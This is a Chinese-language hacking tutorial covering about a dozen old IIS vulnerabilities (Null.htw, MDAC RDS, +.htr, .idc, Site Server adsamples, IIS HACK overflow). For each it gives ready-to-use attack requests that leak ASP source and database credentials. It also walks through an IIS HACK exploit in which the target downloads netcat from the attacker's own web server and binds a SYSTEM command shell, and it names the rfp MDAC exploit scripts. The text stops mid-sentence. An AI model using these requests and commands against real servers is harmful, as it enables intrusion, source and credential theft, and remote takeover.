13個(gè)IIS漏洞分析及漏洞利用-Null.htw、ISM.DLL等

    去年下半年關(guān)于IIS的漏洞層出不窮，鑒于目前IIS的廣泛使用，覺得有必要把收集的資料加以總結(jié)一下，

IIS漏洞分析及漏洞利用

    1．介紹

    這里介紹的方法主要通過端口80來完成操作，具有很大的威脅性，因?yàn)樽鳛榫W(wǎng)絡(luò)服務(wù)器80端口總要打開的。如果想方便一些，下載一些WWW、CGI掃描器來輔助檢查。

    而且要知道目標(biāo)機(jī)器運(yùn)行的是何種服務(wù)程序，你可以使用以下命令：

    telnet 《目標(biāo)機(jī)》 80

    GET HEAD / HTTP/1.0

    就可以返回一些域名和WEB服務(wù)程序版本，如果有些服務(wù)器把WEB服務(wù)運(yùn)行在8080，81，8000，8001口，你就TELNET相應(yīng)的口上。

    2．常見漏洞

    （1）、Null.htw

    IIS如果運(yùn)行了Index Server就包含了一個(gè)通過Null.htw有關(guān)的漏洞，即服務(wù)器上不存在此.htw結(jié)尾的文件。這個(gè)漏洞會導(dǎo)致顯示ASP腳本的源代碼， global.asa里面包含了用戶帳戶等敏感信息。如果攻擊者提供特殊的URL請求給IIS就可以跳出虛擬目錄的限制，進(jìn)行邏輯分區(qū)和ROOT目錄的訪問。而這個(gè)"hit-highlighting"功能在Index Server中沒有充分防止各種類型文件的請求，所以導(dǎo)致攻擊者訪問服務(wù)器上的任意文件。Null.htw功能可以從用戶輸入中獲得3個(gè)變量：

    CiWebhitsfile

    CiRestriction

    CiHiliteType

    你可通過下列方法傳遞變量來獲得如default.asp的源代碼：

    http://www.目標(biāo)機(jī).com/null.htw?CiWebhitsfile=/default.asp%20&%20

    CiRestriction=none%20&%20&CiHiliteType=full其中不需要一個(gè)合法的.htw文件是因?yàn)樘摂M文件已經(jīng)存儲在內(nèi)存中了。

    （2）、MDAC- 執(zhí)行本地命令漏洞

    這個(gè)漏洞出現(xiàn)得比較早，但在全球范圍內(nèi)，可能還有好多IIS WEB服務(wù)器存在這個(gè)漏洞，就像在今天，還有很多人在用Windows3.2一樣。IIS的MDAC組件存在一個(gè)漏洞，可以導(dǎo)致攻擊者遠(yuǎn)程執(zhí)行目標(biāo)系統(tǒng)的命令。主要核心問題是存在于RDSDatafactory，默認(rèn)情況下，它允許遠(yuǎn)程命令發(fā)送到IIS服務(wù)器中，這命令會以設(shè)備用戶的身份運(yùn)行，在默認(rèn)情況下是SYSTEM用戶。我們可以通過以下辦法測試本機(jī)是否存在這個(gè)漏洞：

    c:\》nc -nw -w 2 《目標(biāo)機(jī)》 80

    GET /msadc/msadcs.dll HTTP

    如果你得到下面的信息：

    application/x_varg

    就很有可能存在此漏洞且沒有打上補(bǔ)丁，你可以使用rain forest puppy網(wǎng)站的兩個(gè)程序進(jìn)行測（www.wiretrip.net/rfp）==》mdac.pl和msadc2.pl。

    （3）、ASP Dot Bug

    這個(gè)漏洞出現(xiàn)得比較早了，是Lopht小組在1997年發(fā)現(xiàn)的缺陷，這個(gè)漏洞也是泄露ASP源代碼給攻擊者，一般在IIS3.0上存在此漏洞，在請求的URL結(jié)尾追加一個(gè)或者多個(gè)點(diǎn)導(dǎo)致泄露ASP源代碼，

電腦資料

    （4）、idc & .ida Bugs

    這個(gè)漏洞實(shí)際上類似ASP dot 漏洞，其能在IIS4.0上顯示其WEB目錄信息，很奇怪有些人還在IIS5.0上發(fā)現(xiàn)過此類漏洞，通過增加?idc?或者?ida?后綴到URL會導(dǎo)致IIS嘗試允許通過數(shù)據(jù)庫連接程序.DLL來運(yùn)行.IDC，如果此.idc不存在，它就返回一些信息給客戶端。

    http://www.目標(biāo)機(jī).com/anything.idc 或者 anything.idq

    （5）、+.htr Bug

    這個(gè)漏洞是由NSFOCUS發(fā)現(xiàn)的，對有些ASA和ASP追加+.htr的URL請求就會導(dǎo)致文件源代碼的泄露： http://www.目標(biāo)機(jī).com/global.asa+.htr

    （6）、NT Site Server Adsamples 漏洞

    通過請求site.csc，一般保存在/adsamples/config/site.csc中，攻擊者可能獲得一些如數(shù)據(jù)庫中的DSN，UID和PASS的一些信息，如：

    http://www.目標(biāo)機(jī).com/adsamples/config/site.csc

    （7）、IIS HACK

    有人發(fā)現(xiàn)了一個(gè)IIS4.0的緩沖溢出漏洞，可以允許用戶上載程序，如上載netcat到目標(biāo)服務(wù)器，并把cmd.exe綁定到80端口。這個(gè)緩沖溢出主要存在于.htr,.idc和.stm文件中，其對關(guān)于這些文件的URL請求沒有對名字進(jìn)行充分的邊界檢查，導(dǎo)致運(yùn)行攻擊者插入一些后門程序在系統(tǒng)中下載和執(zhí)行程序。要檢測這樣的站點(diǎn)你需要兩個(gè)文件iishack.exe，ncx.exe，你可以到站點(diǎn)www.technotronic.com中去下載，另外你還需要一臺自己的WEB服務(wù)器，也可以是虛擬服務(wù)器哦。你現(xiàn)在你自己的WEB服務(wù)器上運(yùn)行WEB服務(wù)程序并把ncx.exe放到你自己相應(yīng)的目錄下，然后使用iishack.exe來檢查目標(biāo)機(jī)器：

    c:\》iishack.exe 《目標(biāo)機(jī)》 80 《你的WEB服務(wù)器》/ncx.exe

    然后你就使用netcat來連接你要檢測的服務(wù)器：

    c:\》nc 《目標(biāo)機(jī)》 80

    如果溢出點(diǎn)正確，你就可以看到目標(biāo)機(jī)器的命令行提示，并且是遠(yuǎn)程管理權(quán)限。Codebrws.asp & Showcode.asp 。Codebrws.asp和Showcode.asp在IIS4.0中是附帶的看文件的程序，但不是默認(rèn)安裝的，這個(gè)查看器是在管理員允許查看樣例文件作為聯(lián)系的情況下安裝的。但是，這個(gè)查看器并沒有很好地限制所訪問的文件，遠(yuǎn)程攻擊者可以利用這個(gè)漏洞來查看目標(biāo)機(jī)器上的任意文件內(nèi)容，但要注意以下幾點(diǎn)：

    1．Codebrws.asp 和 Showcode.asp默認(rèn)情況下不安裝。 　　2．漏洞僅允許查看文件內(nèi)容。 　　3．這個(gè)漏洞不能繞過WINDOWS NT的ACL控制列表的限制。 　　4．只允許同一分區(qū)下的文件可以被查看（所以把IIS目錄和WINNT分區(qū)安裝是個(gè)不錯(cuò)的方案，這樣也可能比較好的防止最新的IIS5.0的unicode漏洞）.

    5．攻擊者需要知道請求的文件名。

    例如你發(fā)現(xiàn)存在這個(gè)文件并符合上面的要求，你可以請求如下的命令：